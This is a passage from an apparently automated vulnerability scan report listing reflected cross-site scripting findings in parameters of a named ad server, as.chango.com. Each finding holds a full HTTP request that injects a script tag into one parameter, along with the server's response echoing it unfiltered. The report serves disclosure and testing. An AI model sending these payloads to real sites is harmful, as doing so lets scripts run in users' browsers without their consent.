P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2227
Date: Wed, 05 Oct 2011 21:34:25 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834c72d5e303fb907dd06973053; Domain=chango.com; expires=Sat, 02 Oct 2021 21:34:25 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cwattpad.com%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Fri, 04 Nov 2011 21:34:25 GMT; Path=/

<html><head><title></title>
</head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.28618
...[SNIP]...
99&adid=13713&agid=11720&stid=wattpad.com&url=http://www.wattpad.com/stories&dom=wattpad.com&ibs=None&mw=1.0&poo=p&kwid=5827704&eid=Rubicon&cid=10449&agid=11720&sid=b9930120-ef97-11e0-9408-00259035e51e1b9c5"><script>alert(1)</script>48c2cd12581&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.35773620016&wp=1.330389&kw=Malware+freeware&uf=0&kf=452151&atype=HISTORIC&test=0&adpos=0&bidder=bidder03-sj-west&ioi=13672&ts=1317849575383&sig=e68250
...[SNIP]...

3.28. http://as.chango.com/links/adunit/1.31784957539e+12 [sig parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31784957539e+12

Issue detail

The value of the sig request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80b16"><script>alert(1)</script>783c5556847 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31784957539e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder03-sj-west&bm=1.35773620016&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=wattpad.com&dsi=None&ebp=o2FngYugoHt2Y2Oheg&eid=Rubicon&ht=250&ibs=None&kf=452151&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=b9930120-ef97-11e0-9408-00259035e51e&st=broad&stid=wattpad.com&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317849575383&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.wattpad.com%2Fstories&wh=300&wp=2A68251C3E718625&sig=e682501f8c01fe1c4019354e8f49989080b16"><script>alert(1)</script>783c5556847 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7941/12756/23272-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_rc=1; cc.i.10449=13715%7Cnews.com.au%7C5829597%7CRubicon%7C10449%7Cnamemedia%7C11782%7Cbroad; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_ab=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "7e38d79cb93d4fe5dbe898a360116615053d75b1"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2230
Date: Wed, 05 Oct 2011 21:34:27 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834c72d5e303fb907dd06973053; Domain=chango.com; expires=Sat, 02 Oct 2021 21:34:27 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cwattpad.com%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Fri, 04 Nov 2011 21:34:27 GMT; Path=/

<html><head><title></title>
</head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.28618
...[SNIP]...
e&da=10087&st=broad&bm=1.35773620016&wp=1.330389&kw=Malware+freeware&uf=0&kf=452151&atype=HISTORIC&test=0&adpos=0&bidder=bidder03-sj-west&ioi=13672&ts=1317849575383&sig=e682501f8c01fe1c4019354e8f49989080b16"><script>alert(1)</script>783c5556847&cu=&dsi=None&clickURL=">
...[SNIP]...

3.29. http://as.chango.com/links/adunit/1.31784957539e+12 [st parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31784957539e+12

Issue detail

The value of the st request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6b5e"><script>alert(1)</script>2f9aa55d8cd was submitted in the st parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31784957539e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder03-sj-west&bm=1.35773620016&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=wattpad.com&dsi=None&ebp=o2FngYugoHt2Y2Oheg&eid=Rubicon&ht=250&ibs=None&kf=452151&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=b9930120-ef97-11e0-9408-00259035e51e&st=broadc6b5e"><script>alert(1)</script>2f9aa55d8cd&stid=wattpad.com&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317849575383&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.wattpad.com%2Fstories&wh=300&wp=2A68251C3E718625&sig=e682501f8c01fe1c4019354e8f499890 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7941/12756/23272-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_rc=1; cc.i.10449=13715%7Cnews.com.au%7C5829597%7CRubicon%7C10449%7Cnamemedia%7C11782%7Cbroad; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_ab=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "2ea3068e5970042c7238e86b285d2553a7c4c30f"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2230
Date: Wed, 05 Oct 2011 21:34:25 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834c72d5e303fb907dd06973053; Domain=chango.com; expires=Sat, 02 Oct 2021 21:34:25 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cwattpad.com%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroadc6b5e%22%3E%3Cscript%3Ealert%281%29%3C/script%3E2f9aa55d8cd; Domain=chango.com; expires=Fri, 04 Nov 2011 21:34:25 GMT; Path=/

<html><head><title></title>
</head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.28618
...[SNIP]...
=http://www.wattpad.com/stories&dom=wattpad.com&ibs=None&mw=1.0&poo=p&kwid=5827704&eid=Rubicon&cid=10449&agid=11720&sid=b9930120-ef97-11e0-9408-00259035e51e&dc=namemedia&datc=san jose&da=10087&st=broadc6b5e"><script>alert(1)</script>2f9aa55d8cd&bm=1.35773620016&wp=1.330389&kw=Malware+freeware&uf=0&kf=452151&atype=HISTORIC&test=0&adpos=0&bidder=bidder03-sj-west&ioi=13672&ts=1317849575383&sig=e682501f8c01fe1c4019354e8f499890&cu=&dsi=None&click
...[SNIP]...

3.30. http://as.chango.com/links/adunit/1.31784957539e+12 [stid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31784957539e+12

Issue detail

The value of the stid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1092"><script>alert(1)</script>8ac10f85f2b was submitted in the stid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31784957539e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder03-sj-west&bm=1.35773620016&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=wattpad.com&dsi=None&ebp=o2FngYugoHt2Y2Oheg&eid=Rubicon&ht=250&ibs=None&kf=452151&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=b9930120-ef97-11e0-9408-00259035e51e&st=broad&stid=wattpad.comb1092"><script>alert(1)</script>8ac10f85f2b&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317849575383&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.wattpad.com%2Fstories&wh=300&wp=2A68251C3E718625&sig=e682501f8c01fe1c4019354e8f499890 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7941/12756/23272-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_rc=1; cc.i.10449=13715%7Cnews.com.au%7C5829597%7CRubicon%7C10449%7Cnamemedia%7C11782%7Cbroad; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_ab=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "4d9a96015b547482e426476fc6e5fcf31987ce3f"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 05 Oct 2011 21:34:26 GMT
Content-Length: 2230
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834c72d5e303fb907dd06973053; Domain=chango.com; expires=Sat, 02 Oct 2021 21:34:26 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cwattpad.comb1092%22%3E%3Cscript%3Ealert%281%29%3C/script%3E8ac10f85f2b%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Fri, 04 Nov 2011 21:34:26 GMT; Path=/

<html><head><title></title>
</head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B5866234.13;sz=300x250;ord=1317850466064;click1=http://as.chango.com/links/click1317850466.07?acid=10699&adid=13713&agid=11720&stid=wattpad.comb1092"><script>alert(1)</script>8ac10f85f2b&url=http://www.wattpad.com/stories&dom=wattpad.com&ibs=None&mw=1.0&poo=p&kwid=5827704&eid=Rubicon&cid=10449&agid=11720&sid=b9930120-ef97-11e0-9408-00259035e51e&dc=namemedia&datc=san jose&da=10087&st=b
...[SNIP]...

3.31. http://as.chango.com/links/adunit/1.31784957539e+12 [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31784957539e+12

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7ea1"><script>alert(1)</script>cad35c4bc85 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31784957539e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder03-sj-west&bm=1.35773620016&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=wattpad.com&dsi=None&ebp=o2FngYugoHt2Y2Oheg&eid=Rubicon&ht=250&ibs=None&kf=452151&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=b9930120-ef97-11e0-9408-00259035e51e&st=broad&stid=wattpad.com&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317849575383&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.wattpad.com%2Fstoriesa7ea1"><script>alert(1)</script>cad35c4bc85&wh=300&wp=2A68251C3E718625&sig=e682501f8c01fe1c4019354e8f499890 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7941/12756/23272-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_rc=1; cc.i.10449=13715%7Cnews.com.au%7C5829597%7CRubicon%7C10449%7Cnamemedia%7C11782%7Cbroad; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_ab=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "54ef44e677231ebdf45652bd6ed6974023653d96"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2230
Date: Wed, 05 Oct 2011 21:34:26 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834c72d5e303fb907dd06973053; Domain=chango.com; expires=Sat, 02 Oct 2021 21:34:26 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cwattpad.com%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Fri, 04 Nov 2011 21:34:26 GMT; Path=/

<html><head><title></title>
</head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B5866234.13;sz=300x250;ord=1317850466452;click1=http://as.chango.com/links/click1317850466.46?acid=10699&adid=13713&agid=11720&stid=wattpad.com&url=http://www.wattpad.com/storiesa7ea1"><script>alert(1)</script>cad35c4bc85&dom=wattpad.com&ibs=None&mw=1.0&poo=p&kwid=5827704&eid=Rubicon&cid=10449&agid=11720&sid=b9930120-ef97-11e0-9408-00259035e51e&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.35773620016&wp=1.330389&k
...[SNIP]...

3.32. http://as.chango.com/links/adunit/1.31784957539e+12 [wh parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31784957539e+12

Issue detail

The value of the wh request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcafe"><script>alert(1)</script>248a71ad420 was submitted in the wh parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31784957539e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder03-sj-west&bm=1.35773620016&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=wattpad.com&dsi=None&ebp=o2FngYugoHt2Y2Oheg&eid=Rubicon&ht=250&ibs=None&kf=452151&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=b9930120-ef97-11e0-9408-00259035e51e&st=broad&stid=wattpad.com&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317849575383&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.wattpad.com%2Fstories&wh=300fcafe"><script>alert(1)</script>248a71ad420&wp=2A68251C3E718625&sig=e682501f8c01fe1c4019354e8f499890 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7941/12756/23272-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_rc=1; cc.i.10449=13715%7Cnews.com.au%7C5829597%7CRubicon%7C10449%7Cnamemedia%7C11782%7Cbroad; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_ab=1

Response

HTTP/1.1 200 OK
Content-Length: 466
Server: Chango RTB Server
ETag: "896695bff703bfd4bb3d4a6a0bcddc7a9052d6a4"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Date: Wed, 05 Oct 2011 21:34:26 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834c72d5e303fb907dd06973053; Domain=chango.com; expires=Sat, 02 Oct 2021 21:34:26 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cwattpad.com%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Fri, 04 Nov 2011 21:34:26 GMT; Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
</head>
<body style="width: 300fcafe"><script>alert(1)</script>248a71ad420px; height: 250px; margin: 0; padding: 0;">
...[SNIP]...

3.33. http://as.chango.com/links/adunit/1.31784959608e+12 [adpos parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31784959608e+12

Issue detail

The value of the adpos request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b19b"><script>alert(1)</script>002eeaa7af8 was submitted in the adpos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31784959608e+12?adid=13711&adpos=02b19b"><script>alert(1)</script>002eeaa7af8&agid=11720&atype=HISTORIC&bidder=bidder02-sj-west&bm=1.35767665494&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=wattpad.com&dsi=None&ebp=o2FngYufpHt6aGepeA&eid=Rubicon&ht=90&ibs=None&kf=452172&kw=Malware+freeware&kwid=5827781&mw=1.0&poo=o&sid=c5e895a2-ef97-11e0-9e9f-00259035d82c&st=broad&stid=wattpad.com&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317849596069&uf=4&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.wattpad.com%2Fstories%2Fsearch%2Fxss%2520carbon&wh=728&wp=942D6ABAF8EA73E5&sig=c485c0cefccda7a06afc37dd5dfc0442 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7941/12756/23272-2.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_rc=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; cc.i.10449=13713%7Cwattpad.com%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "1f1590b559b0aa19fde3473344850ad1d7d05afe"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 05 Oct 2011 21:35:15 GMT
Content-Length: 2283
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834c72d5e30505df43f84a6e5f1; Domain=chango.com; expires=Sat, 02 Oct 2021 21:35:15 GMT; Path=/
Set-Cookie: cc.i.10449=13711%7Cwattpad.com%7C5827781%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Fri, 04 Nov 2011 21:35:15 GMT; Path=/

<html><head><title></title>
</head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.28618
...[SNIP]...
&cid=10449&agid=11720&sid=c5e895a2-ef97-11e0-9e9f-00259035d82c&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.35767665494&wp=1.216667&kw=Malware+freeware&uf=4&kf=452172&atype=HISTORIC&test=0&adpos=02b19b"><script>alert(1)</script>002eeaa7af8&bidder=bidder02-sj-west&ioi=13672&ts=1317849596069&sig=c485c0cefccda7a06afc37dd5dfc0442&cu=&dsi=None&clickURL=">
...[SNIP]...

3.34. http://as.chango.com/links/adunit/1.31784959608e+12 [atype parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31784959608e+12

Issue detail

The value of the atype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 920c1"><script>alert(1)</script>b3a103ed94f was submitted in the atype parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31784959608e+12?adid=13711&adpos=0&agid=11720&atype=HISTORIC920c1"><script>alert(1)</script>b3a103ed94f&bidder=bidder02-sj-west&bm=1.35767665494&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=wattpad.com&dsi=None&ebp=o2FngYufpHt6aGepeA&eid=Rubicon&ht=90&ibs=None&kf=452172&kw=Malware+freeware&kwid=5827781&mw=1.0&poo=o&sid=c5e895a2-ef97-11e0-9e9f-00259035d82c&st=broad&stid=wattpad.com&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317849596069&uf=4&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.wattpad.com%2Fstories%2Fsearch%2Fxss%2520carbon&wh=728&wp=942D6ABAF8EA73E5&sig=c485c0cefccda7a06afc37dd5dfc0442 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7941/12756/23272-2.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_rc=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; cc.i.10449=13713%7Cwattpad.com%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "e6cfb98a4b391414141c6f2d2a30fc58f30166e3"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2283
Date: Wed, 05 Oct 2011 21:35:16 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834c72d5e30505df43f84a6e5f1; Domain=chango.com; expires=Sat, 02 Oct 2021 21:35:16 GMT; Path=/
Set-Cookie: cc.i.10449=13711%7Cwattpad.com%7C5827781%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Fri, 04 Nov 2011 21:35:16 GMT; Path=/

<html><head><title></title>
</head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.28618
...[SNIP]...
781&eid=Rubicon&cid=10449&agid=11720&sid=c5e895a2-ef97-11e0-9e9f-00259035d82c&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.35767665494&wp=1.216667&kw=Malware+freeware&uf=4&kf=452172&atype=HISTORIC920c1"><script>alert(1)</script>b3a103ed94f&test=0&adpos=0&bidder=bidder02-sj-west&ioi=13672&ts=1317849596069&sig=c485c0cefccda7a06afc37dd5dfc0442&cu=&dsi=None&clickURL=">
...[SNIP]...

3.35. http://as.chango.com/links/adunit/1.31784959608e+12 [bidder parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31784959608e+12

Issue detail

The value of the bidder request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2fefb"><script>alert(1)</script>5a00be50b31 was submitted in the bidder parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31784959608e+12?adid=13711&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder02-sj-west2fefb"><script>alert(1)</script>5a00be50b31&bm=1.35767665494&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=wattpad.com&dsi=None&ebp=o2FngYufpHt6aGepeA&eid=Rubicon&ht=90&ibs=None&kf=452172&kw=Malware+freeware&kwid=5827781&mw=1.0&poo=o&sid=c5e895a2-ef97-11e0-9e9f-00259035d82c&st=broad&stid=wattpad.com&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317849596069&uf=4&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.wattpad.com%2Fstories%2Fsearch%2Fxss%2520carbon&wh=728&wp=942D6ABAF8EA73E5&sig=c485c0cefccda7a06afc37dd5dfc0442 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7941/12756/23272-2.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_rc=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; cc.i.10449=13713%7Cwattpad.com%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "621f0d845a9307f7bb3000478156714bbab31411"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2283
Date: Wed, 05 Oct 2011 21:35:16 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834c72d5e30505df43f84a6e5f1; Domain=chango.com; expires=Sat, 02 Oct 2021 21:35:16 GMT; Path=/
Set-Cookie: cc.i.10449=13711%7Cwattpad.com%7C5827781%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Fri, 04 Nov 2011 21:35:16 GMT; Path=/

<html><head><title></title>
</head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.28618
...[SNIP]...
